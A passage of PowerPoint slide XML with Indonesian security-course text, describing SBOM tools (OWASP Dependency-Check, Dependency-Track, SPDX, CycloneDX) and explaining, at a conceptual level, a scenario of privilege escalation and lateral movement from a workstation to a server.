              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen-komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SBOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perspektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dependency-Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketinggalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zaman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disertakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SBOM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lisensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lengkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sub-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SBOM yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyertakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OWASP Dependency-Track </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Dependency-Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SBOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SPDX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>CycloneDX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SPDX (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Data Paket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Lunak) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengomunikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bill of material </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lisensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>referensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>CycloneDX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data SBOM.</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184</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330734391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1. Notepad (local admin) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>memicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> proses di server (SYSTEM account)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Lateral Movement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Pass-the-Hash / Pass-the-Ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Remote Code Execution).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Notepad di workstation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seharusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses di server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>SYSTEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>eskalasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Karena proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>workstation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
